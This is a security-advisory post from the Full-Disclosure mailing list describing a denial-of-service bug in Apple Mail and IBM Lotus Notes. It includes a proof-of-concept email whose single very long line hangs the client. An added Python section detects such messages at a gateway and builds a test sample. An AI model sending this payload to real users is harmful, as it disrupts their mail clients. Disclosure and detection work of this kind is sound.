[Full-disclosure] Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)
***Summary***

A maliciously crafted e-mail message can cause a denial of service in
multiple versions of the Apple Mail email client.

***Scope***

Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)

Note: other versions of this product may be vulnerable as well; I have
not tested them. The vendor has been made aware of this issue and has
chosen not to treat it as a security issue.

Interestingly enough, a similar issue seems to be present in multiple
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z --
http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611). The
exploit provided in this advisory will also cause a denial of service
condition on multiple versions of IBM Lotus Notes. IBM has been kind
enough to create SPR# PRAD7DPKLW to address the issue the exploit
targets.

***Description***

An email message with a maliciously crafted body (in my tests I used a
long line) can cause the e-mail client to hang, resulting in a denial
of service condition. Testing with emails that do not have any
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line
consisting of 1.5 MB can cause the email clients to hang for over half
an hour.

Initial testing reveals the following:

In Apple Mail, the e-mail is rendered correctly in the preview pane
but a subsequent click on a different e-mail causes the application to
hang.

***Credits***

David Wharton

***References***

Apple Mail
http://www.apple.com/macosx/features/mail.html

***PoC Exploit***

Below is a sample e-mail with headers (some headers removed or
modified) that causes the e-mail clients to hang as discussed. Note
that the body is one long line and the "=" character is not part of
it; it is there only for formatting (the message is quoted-printable
encoded), and in reality most of the body is one long contiguous
string of A's.

Subject: dos test
MIME-Version: 1.0
From: xxxxx@xxxxxxxxx
To: xxxxx@xxxxxxxxx
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@xxxxxxxxx>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
    charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@xxxxxxxxx
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@


<font
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</
font>N=
OTICE: This e-mail message and all attachments transmitted with it
may con=
tain confidential information intended solely for the use of the
addressee.=
<br />=
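A gateway-side check for the message shape described in the Description and PoC sections above: a text part which, once its quoted-printable soft line breaks are undone, contains a single run of bytes with no CR (0x0D), LF (0x0A) or space (0x20) far longer than a client can be expected to lay out. This is an added example and not part of the original advisory. The 64 KiB threshold, the function names and the constructed sample message are assumptions made for the example; the sample is built with a short run rather than the advisory's 1.5 MB. The point it makes is that the check has to run on the decoded body: in transit the PoC's body is broken every 76 bytes by "=" soft breaks, so a raw line-length limit on the wire format never sees the long line.

```python
"""Gateway-side detector for the single-unbroken-line pattern.

Added example, not the advisory's code. It parses an RFC 822 message,
decodes each text part's Content-Transfer-Encoding (quoted-printable
soft breaks '=\\n' disappear during decoding), then measures the
longest run of bytes containing none of 0x0A, 0x0D or 0x20.
"""
from __future__ import annotations

import email
import quopri
import re
from email import policy
from typing import List, Tuple

# Assumed threshold for the longest run without CR, LF or space. The
# advisory reports a hang at 1.5 MB; 64 KiB leaves a wide margin while
# staying far above anything a legitimate HTML mail produces.
MAX_RUN_BYTES = 64 * 1024

_BREAK = re.compile(rb"[\x0a\x0d\x20]")


def longest_unbroken_run(data: bytes) -> int:
    """Length of the longest byte run containing no LF, CR or space."""
    return max((len(chunk) for chunk in _BREAK.split(data)), default=0)


def scan_message(raw: bytes, limit: int = MAX_RUN_BYTES) -> List[Tuple[str, int]]:
    """Return (content_type, run_length) for every text part over the limit.

    get_payload(decode=True) undoes quoted-printable or base64, so the
    '=' soft breaks that wrap the PoC body on the wire cannot hide the
    long line from the measurement.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        body = part.get_payload(decode=True) or b""
        run = longest_unbroken_run(body)
        if run > limit:
            findings.append((part.get_content_type(), run))
    return findings


def build_sample(run_length: int) -> bytes:
    """Constructed message shaped like the advisory's PoC: a text/html,
    quoted-printable body whose decoded form is one long run of 'A's
    inside a <font> element. Addresses are placeholders."""
    decoded = '<font size="2">' + "A" * run_length + "</font>"
    # quopri wraps at 76 columns with '=\n' soft breaks, exactly the
    # '=' formatting seen in the posted PoC.
    encoded = quopri.encodestring(decoded.encode("latin-1"))
    headers = (
        b"Subject: constructed sample\n"
        b"MIME-Version: 1.0\n"
        b"From: sender@example.invalid\n"
        b"To: recipient@example.invalid\n"
        b"Content-Type: text/html; charset=ISO-8859-1\n"
        b"Content-Transfer-Encoding: quoted-printable\n"
        b"\n"
    )
    return headers + encoded


if __name__ == "__main__":
    # A 100 000-byte run trips the check; a 1 000-byte run does not.
    for n in (1_000, 100_000):
        print(n, scan_message(build_sample(n)))
```

The detector reports the decoded run length per part, which is what a quarantine rule or a rewrite step (for instance inserting a break every few thousand bytes before delivery to the clients named in the Scope section) needs. Measuring the raw message instead would report at most 76 bytes for the PoC, because every encoded line ends in a soft break.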

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


